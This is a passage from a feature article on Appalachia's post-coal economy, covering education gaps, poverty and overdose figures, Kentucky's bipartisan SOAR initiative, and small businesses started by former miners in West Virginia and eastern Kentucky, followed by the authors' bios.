All around Appalachia, people are trying to harness that possibility and realize that opportunity for as many people as possible, by trying to figure out how to both capitalize on their strengths in new areas and improve existing economic sectors (and how to do both fast). In some places, these efforts have the flash of millennial innovation (life sciences businesses, tech startups), and in others (auto shops, aerospace mechanics) they don’t. They involve new ideas and existing infrastructures, young people who are just starting their careers, and people who have had to figure out, in the middle of their lives, how to start over.

These efforts are encouraging—as are the modest drops in forecasted unemployment rates in both West Virginia and Kentucky, led by construction, professional, and service sectors—but they exist within a context of systemic, pervasive challenges. The decline of coal has affected not just those who work in the industry, though they are undoubtedly hit the hardest, but also those who work in transportation, as metal fabricators, even at shopping malls. Entrepreneurship is a major tenant of a diversified Appalachian economy, but Appalachian entrepreneurs often lack access to capital; there is not a single venture capital firm in the state of West Virginia, which Forbes has declared the worst state in the country in which to do business. An average of 29% of the population of Eastern Kentucky is below the poverty line; in West Virginia, it’s 18%. West Virginia had the country’s highest percentage of drug-overdose deaths in 2014, and it’s losing population faster than any state in the country. John Deskins, director of the WVU BBER, says the state’s main economic challenge is human capital: a healthy, skilled workforce.

The major barrier to a skilled workforce, of course, is lack of education. Coal provided high-paying jobs for those with relatively little education, and now that workforce is often ill-prepared for other markets, but they’re not alone. Only 19% of the population of West Virginia and an average of 12% of the population of eastern Kentucky have bachelor degrees or higher. (Projections suggest that, in West Virginia alone, 52% of jobs will require post-secondary degrees by 2020.)

Here, there is progress: WVU and the West Virginia Higher Education Policy Commission are working to improve graduation rates with student-centered programs that target rural counties with low college attendance, offer on-campus support, and support entrepreneurialism, and last year the state had a record number of two- and four-year graduates. Almost every economic-development initiative we saw in West Virginia and eastern Kentucky came back, somehow, to education, even if just a workshop, training program, or retraining program. (Many involved financial assistance.) Progress in education can be slow to pay off, especially considering the length of a bachelor’s degree, but it must be prioritized, says Chris Bollinger, director of the University of Kentucky Center of Business and Economic Research. Otherwise, history stands to repeat itself yet again: “A generation from now, we’re going to be in the same place,” he said. “You can go back to Night Comes to the Cumberlands“—Harry Caudill’s seminal 1963 book on the region’s troubled and depressed history—”and it could have been written yesterday.”

In Kentucky, a bipartisan initiative called SOAR (Shaping our Appalachian Region) united longtime Republican Congressman Hal Rogers and Republican Governor Matt Bevin in an “honest dialogue” about a future beyond eastern Kentucky’s struggling coal economy, with events and seminars that work toward job creation and innovation in what it calls a “landscape-changing enterprise.” It’s not an understatement: By dint of its existence, SOAR has given state actors like the Mountain Association for Community Economic Development (MACED) a new freedom. When we sat down at the 40-year-old advocacy group’s office in Berea, Kentucky, its director, Peter Hille, pointed to a row of books on a shelf behind him, which contained a 1986 MACED coal study that, among other things, challenged the longevity of coal and its economic impact on the state. “There’s stuff in there that was not popular to say,” he says. “But now you’ve got Rogers, the Republican chair of the appropriations committee, saying essentially, ‘Coal’s not coming back and we need to do something different.'”

That this kind of dialogue is lacking in West Virginia leaves people like James Van Nostrand, director of the WVU College of Law’s Center for Energy and Sustainable Development, still feeling hamstrung in his ability to act on what he considers economics-driven issues, not political ones. “It makes it harder to have those conversations about where we need to go when some are saying, ‘We don’t need to go anywhere, we just need to get the EPA off our back,'” Van Nostrand said. “It’s a complete copout in terms of the leadership we need to start addressing these issues.”

An Old Story With A New Ending

Perhaps some solace is that many people we met, from former coal miners to independent artists, weren’t waiting—they were addressing their issues themselves, as best they could. In Beckley, West Virginia, a former miner opens an auto shop. In Charleston, a man starts a hotdog stand as part of a downtown revitalization. In Berea, Kentucky, an artist sells her friends’ work in her art and coffee house. Nearby, a laid-off miner is trained for a new job: to retrofit houses to be more energy efficient. It isn’t that simple, of course—as Hille put it, we also need an industrial-sized solution, because we have an industrial-sized problem—but Deskins and Bollinger agree: that these small independent actors are a big part of a diverse economy’s success. When citizens are given the resources they need to open a business or retrain for a new job, Bollinger says, “People making decisions about the economic conditions around them generally make good decisions.”

In driving through West Virginia and eastern Kentucky, we found five places being shaped by these kinds of decisions—and the new economies that can spring up around them. They do not represent a comprehensive overview of the many efforts like them, nor are they the only way forward. If there is one common thread of the many conversations we had in the region, it’s that there can never be just one way again.

In Berea, Hille spoke about a project he did years ago, visiting rural communities around the country with the Kellogg Foundation. Everywhere he went, someone would tell him what made their hometown different. This is what’s happening here, they would say: Their economy wasn’t working anymore, their children were leaving, their businesses were boarding up, their schools were closing, and they didn’t know what to do. They might have been talking about cotton in the South, timber in the Pacific Northwest, or sugar cane in Hawaii. When you looked past the details, it was the same story everywhere. Now, though, there might be a happier ending.

Next Stop: Morgantown, West Virginia: Can West Virginia University Jump-Start A New Economy Based On Innovation—Not Coal?

Courtney Balestier is a James Beard-nominated writer whose work has appeared in the New Yorker online, the New York Times, the Oxford American, and elsewhere. She writes often about Appalachia. 

Elaine McMillion Sheldon is a Peabody award-winning documentary filmmaker and visual journalist. She’s currently in production on a feature-length documentary about the lives of several young men escaping the opioid epidemic in Appalachia.